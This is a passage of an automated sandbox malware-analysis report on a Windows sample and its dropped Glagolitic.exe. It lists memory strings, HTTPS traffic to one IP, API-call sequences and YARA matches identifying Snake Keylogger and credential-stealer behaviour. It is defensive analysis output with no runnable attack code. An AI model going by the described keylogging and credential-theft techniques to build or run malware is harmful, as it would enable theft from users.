              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003410000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBDr
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,0_2_0047C81C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,2_2_0047C81C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C

              System Summary

              barindex
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0046A07E
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004710F1 NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_004710F1
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045034C GetParent,NtdllDialogWndProc_W,0_2_0045034C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044036A NtdllDialogWndProc_W,0_2_0044036A
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00440306 NtdllDialogWndProc_W,0_2_00440306
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047132F NtdllDialogWndProc_W,0_2_0047132F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00440338 NtdllDialogWndProc_W,0_2_00440338
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_0046A38E
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_0045039B
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_004404E8
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044048E NtdllDialogWndProc_W,0_2_0044048E
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044786A NtdllDialogWndProc_W,0_2_0044786A
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,0_2_0047C81C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,0_2_004478AC
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,0_2_004479A0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_004629B7
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047EA6F NtdllDialogWndProc_W,0_2_0047EA6F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00447ABC SendMessageW,NtdllDialogWndProc_W,0_2_00447ABC
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00447B4E NtdllDialogWndProc_W,0_2_00447B4E
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00454CFC NtdllDialogWndProc_W,0_2_00454CFC
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00454D4A NtdllDialogWndProc_W,0_2_00454D4A
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0042FDA6 ClientToScreen,NtdllDialogWndProc_W,0_2_0042FDA6
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0042FE05 NtdllDialogWndProc_W,0_2_0042FE05
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00470E96
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_0046A07E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004710F1 NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_004710F1
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045034C GetParent,NtdllDialogWndProc_W,2_2_0045034C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044036A NtdllDialogWndProc_W,2_2_0044036A
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00440306 NtdllDialogWndProc_W,2_2_00440306
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047132F NtdllDialogWndProc_W,2_2_0047132F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00440338 NtdllDialogWndProc_W,2_2_00440338
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W,2_2_0046A38E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,2_2_0045039B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_004404E8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044048E NtdllDialogWndProc_W,2_2_0044048E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044786A NtdllDialogWndProc_W,2_2_0044786A
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,2_2_0047C81C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,2_2_004478AC
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,2_2_004479A0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W,2_2_004629B7
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047EA6F NtdllDialogWndProc_W,2_2_0047EA6F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00447ABC SendMessageW,NtdllDialogWndProc_W,2_2_00447ABC
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00447B4E NtdllDialogWndProc_W,2_2_00447B4E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00454CFC NtdllDialogWndProc_W,2_2_00454CFC
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00454D4A NtdllDialogWndProc_W,2_2_00454D4A
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0042FDA6 ClientToScreen,NtdllDialogWndProc_W,2_2_0042FDA6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0042FE05 NtdllDialogWndProc_W,2_2_0042FE05
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00470E96
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00401100 NtdllDefWindowProc_W,KillTimer,PostQuitMessage,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,5_2_00401100
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_0046A07E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004710F1 NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,5_2_004710F1
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045034C GetParent,NtdllDialogWndProc_W,5_2_0045034C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044036A NtdllDialogWndProc_W,5_2_0044036A
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00440306 NtdllDialogWndProc_W,5_2_00440306
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047132F NtdllDialogWndProc_W,5_2_0047132F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00440338 NtdllDialogWndProc_W,5_2_00440338
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W,5_2_0046A38E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,5_2_0045039B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,5_2_004404E8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044048E NtdllDialogWndProc_W,5_2_0044048E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044786A NtdllDialogWndProc_W,5_2_0044786A
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,5_2_004478AC
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,5_2_004479A0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W,5_2_004629B7
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047EA6F NtdllDialogWndProc_W,5_2_0047EA6F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00447ABC SendMessageW,NtdllDialogWndProc_W,5_2_00447ABC
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00447B4E NtdllDialogWndProc_W,5_2_00447B4E
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00454CFC NtdllDialogWndProc_W,5_2_00454CFC
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00454D4A NtdllDialogWndProc_W,5_2_00454D4A
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0042FDA6 ClientToScreen,NtdllDialogWndProc_W,5_2_0042FDA6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0042FE05 GetWindowLongW,NtdllDialogWndProc_W,5_2_0042FE05
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_00470E96
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,754C5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00446313
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004096A00_2_004096A0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0042200C0_2_0042200C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004041700_2_00404170
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0041A2170_2_0041A217
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004122160_2_00412216
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0042435D0_2_0042435D
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004033C00_2_004033C0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044F4300_2_0044F430
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004125E80_2_004125E8
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044663B0_2_0044663B
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004138010_2_00413801
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0042096F0_2_0042096F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004129D00_2_004129D0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004119E30_2_004119E3
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0041C9AE0_2_0041C9AE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047EA6F0_2_0047EA6F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040FA100_2_0040FA10
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044EB5F0_2_0044EB5F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00423C810_2_00423C81
